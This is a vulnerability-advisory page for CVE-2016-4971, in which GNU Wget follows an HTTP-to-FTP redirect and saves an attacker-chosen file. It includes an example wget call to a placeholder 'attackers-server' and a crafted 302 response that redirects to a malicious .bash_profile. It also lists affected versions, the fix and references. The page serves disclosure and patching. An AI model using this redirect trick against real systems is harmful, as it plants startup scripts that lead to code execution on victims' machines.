CVE-2016-4971
First published: Tue Jun 07 2016(Updated: )
GNU Wget (including the latest version) when supplied with a malicious website link can be tricked into saving an arbitrary remote file supplied by an attacker, with arbitrary contents and filename under the current directory. This can lead to potential code execution by creating system scripts (such as .bash_profile and others) within home directory as well as other unauthorized actions (such as request sniffing by proxy modification, or arbitrary system file retrieval) by uploading .wgetrc configuration file. Because of lack of sufficient controls in wget, when user downloads a file with wget, such as: wget <a href="http://attackers-server/safe_file.txt">http://attackers-server/safe_file.txt</a> An attacker who controls the server could make wget create an arbitrary file with arbitrary contents and filename by issuing a crafted HTTP 30X Redirect containing ftp server reference in response to the victim's wget request. For example, if the attacker's server replies with the following response: HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Location: <a href="ftp://attackers-server/.bash_profile">ftp://attackers-server/.bash_profile</a> Content-Length: 262 Server: Apache wget will automatically follow the redirect and will download a malicious .bash_profile file from a malicious FTP server. It will fail to rename the file to the originally requested filename of 'safe_file.txt' as it would normally do, in case of a redirect to another HTTP resource with a different name. Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary filename to the victim's current directory.
Credit: secalert@redhat.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| Wget | <1.18 | |
| Ubuntu | =12.04 | |
| Ubuntu | =14.04 | |
| Ubuntu | =15.10 | |
| Ubuntu | =16.04 | |
| Oracle Solaris and Zettabyte File System (ZFS) | =10 | |
| Oracle Solaris and Zettabyte File System (ZFS) | =11.3 | |
| Palo Alto Networks PAN-OS | >=6.1.0<=6.1.16 | |
| Palo Alto Networks PAN-OS | >=7.0.0<=7.0.14 | |
| Palo Alto Networks PAN-OS | >=7.1.0<=7.1.9 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- http://git.savannah.gnu.org/cgit/wget.git/commit/?id=e996e322ffd42aaa051602da182d03178d0f13e1
- http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
- http://lists.opensuse.org/opensuse-updates/2016-08/msg00043.html
- http://packetstormsecurity.com/files/162395/GNU-wget-Arbitrary-File-Upload-Code-Execution.html
- http://rhn.redhat.com/errata/RHSA-2016-2587.html
- http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html
- http://www.securityfocus.com/bid/91530
- http://www.securitytracker.com/id/1036133
- http://www.ubuntu.com/usn/USN-3012-1
- https://bugzilla.redhat.com/show_bug.cgi?id=1343666
- https://security.gentoo.org/glsa/201610-11
- https://security.paloaltonetworks.com/CVE-2016-4971
- https://www.exploit-db.com/exploits/40064/
- http://attackers-server/safe_file.txt
- https://bugzilla.redhat.com/show_bug.cgi/ftp:/attackers-server/.bash_profile
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1165694&action=diff
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1165694&action=edit
- https://bugzilla.redhat.com/show_bug.cgi/ftp:/ftp.gnu.org/gnu/wget/wget-1.18.tar.xz
- https://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
- http://git.savannah.gnu.org/cgit/wget.git/commit/?id=59b920874daa565a1323ffa1e756e80493190686
- http://seclists.org/oss-sec/2016/q3/34
- https://rhn.redhat.com/errata/RHSA-2016-2587.html
Frequently Asked Questions
What is the severity of CVE-2016-4971?
CVE-2016-4971 has been classified as a medium severity vulnerability due to its potential for exploitation through malicious website links.
How do I fix CVE-2016-4971?
To fix CVE-2016-4971, you should update GNU Wget to version 1.18 or later.
What are the potential impacts of CVE-2016-4971?
Exploitation of CVE-2016-4971 can lead to unauthorized saving of arbitrary remote files, which may lead to code execution.
Which platforms are affected by CVE-2016-4971?
CVE-2016-4971 affects several versions of GNU Wget and specific versions of Ubuntu Linux and Oracle Solaris.
Is there a workaround for CVE-2016-4971?
A possible workaround for CVE-2016-4971 is to avoid downloading files from untrusted or suspicious websites.
- agent/type
- agent/first-publish-date
- agent/references
- collector/mitre-cve
- source/MITRE
- agent/author
- agent/last-modified-date
- agent/severity
- agent/remedy
- agent/event
- agent/description
- collector/redhat-bugzilla
- source/Red Hat
- alias/CVE-2016-4971
- agent/trending
- agent/source
- agent/softwarecombine
- agent/tags
- collector/nvd-index
- agent/software-canonical-lookup-request
- vendor/gnu
- canonical/wget
- vendor/canonical
- canonical/ubuntu
- version/ubuntu/12.04
- version/ubuntu/14.04
- version/ubuntu/15.10
- version/ubuntu/16.04
- vendor/oracle
- canonical/oracle solaris and zettabyte file system (zfs)
- version/oracle solaris and zettabyte file system (zfs)/10
- version/oracle solaris and zettabyte file system (zfs)/11.3
- vendor/paloaltonetworks
- canonical/palo alto networks pan-os
- version/palo alto networks pan-os/6.1.0
- version/palo alto networks pan-os/6.1.16
- version/palo alto networks pan-os/7.0.0
- version/palo alto networks pan-os/7.0.14
- version/palo alto networks pan-os/7.1.0
- version/palo alto networks pan-os/7.1.9